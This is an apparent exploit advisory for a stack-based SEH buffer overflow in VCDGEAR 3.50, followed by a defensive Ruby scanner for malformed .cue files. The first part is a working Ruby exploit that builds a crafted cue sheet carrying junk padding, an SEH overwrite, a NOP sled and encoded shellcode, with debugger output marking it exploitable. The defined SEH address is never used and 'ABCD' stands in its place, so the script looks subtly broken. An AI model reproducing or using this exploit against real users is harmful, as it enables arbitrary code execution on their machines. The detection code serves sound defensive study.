VCDGEAR 3.50 Stack Buffer Overflow
Posted on 01 March 2014
```ruby
# Author: Provensec www.provensec.com <advisories@provensec.com>
# Tested on: XP SP3 / Windows 7
# Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the
#   application fails to perform adequate boundary checks on user-supplied input.
#   An attacker can exploit this issue to execute arbitrary code in the context of the application.
#   Failed exploit attempts will result in a denial-of-service condition.
# Application vendor: VCDGear 3.50 - http://www.vcdgear.com/files/vcdgear350.zip
#
# 0x00499a1e : pop ecx # pop ebp # ret 0x0c | startnull {PAGE_EXECUTE_READ} [vcdgear.exe]
#   ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
# SEH record (nseh field) at 0x0012f7a4 overwritten with normal pattern : 0x35744134 (offset 580),
#   followed by 1416 bytes of cyclic data
#
# Project1!ScandataFinalize+0x441:
# 00452ff9 c6841553fdffff00 mov byte ptr [ebp+edx-2ADh],0 ss:0023:4112f660=??
# 0:000> !exchain
# 0012f7a4: 44434241
# Invalid exception stack at 909006eb
# 0:000> !exploitable
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\USER32.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
# Exploitability Classification: EXPLOITABLE

shellcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4" +
            "\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff" +
            "\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3" +
            "\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7" +
            "\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc" +
            "\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e" +
            "\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31" +
            "\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2" +
            "\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe" +
            "\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba"

filename = "file.cue"

# Remainder of the cue sheet that follows the oversized FILE path field
header  = " BINARY\n"
header += "  TRACK 01 MODE22352\n"
header += "    INDEX 01 00:00:00\n"

nops    = "\x90" * 20
junk    = "\x41" * 324
nseh    = "\xeb\x06\x90\x90"   # next-SEH field: short jmp over the handler address
seh     = "\x1e\x9a\x49\x00"   # 0x00499a1e : pop ecx # pop ebp # ret 0x0c in vcdgear.exe (no SafeSEH)
padding = "D" * (1412 - (nops.length + shellcode.length))

data = "FILE \"" + junk + nseh + "ABCD" + nops + shellcode + padding + "\"" + header

puts "[*] JUNK size: %i" % [junk.length]
puts "[*] SHELLCODE size: %i" % [shellcode.length]
puts "[*] PADDING size: %i" % [padding.length]

File.open(filename, 'wb') do |fd|
  fd.write data
  puts "[*] FILE CREATED SUCCESSFULLY"
end
```
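The trigger above is a cue sheet whose quoted FILE path is long enough to reach the SEH record and carries raw machine code instead of a file name. The following defender-side scanner, an added example rather than the advisory's own code, flags exactly that shape of input; the length threshold and the sample sheets are assumptions.

```ruby
# Added example (not from the advisory): flag .cue sheets whose FILE path field is
# oversized or contains non-printable bytes, the malformed input the advisory describes.
MAX_FILE_FIELD = 260 # assumed threshold: Windows MAX_PATH; legitimate cue paths are far shorter

def scan_cue(data, max_len: MAX_FILE_FIELD)
  raw = data.b # work on raw bytes: a crafted sheet is not valid text
  findings = []
  pos = 0
  while (start = raw.index(/FILE\s+"/i, pos))
    field_start = raw.index('"', start) + 1
    field_end = raw.index('"', field_start)
    break if field_end.nil? # unterminated field, nothing more to measure
    path = raw[field_start...field_end]
    if path.bytesize > max_len
      findings << { reason: :oversized_file_field, length: path.bytesize, offset: field_start }
    end
    bad = path.bytes.count { |b| b < 0x20 || b > 0x7e }
    if bad > 0
      findings << { reason: :non_printable_bytes, count: bad, offset: field_start }
    end
    pos = field_end + 1
  end
  findings
end

def suspicious?(data)
  !scan_cue(data).empty?
end

# Constructed samples (assumptions, not files from the advisory): a well-formed sheet
# and one that mimics the overflow layout with printable filler and four control bytes.
BENIGN_CUE = "FILE \"disc.bin\" BINARY\n  TRACK 01 MODE2/2352\n    INDEX 01 00:00:00\n"
CRAFTED_CUE = "FILE \"" + ("A" * 580) + "\x01\x02\x03\x04" + ("D" * 1000) +
              "\" BINARY\n  TRACK 01 MODE2/2352\n    INDEX 01 00:00:00\n"

if __FILE__ == $0
  [BENIGN_CUE, CRAFTED_CUE].each do |sheet|
    puts "#{suspicious?(sheet) ? 'SUSPICIOUS' : 'ok'}: #{scan_cue(sheet).inspect}"
  end
end
```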
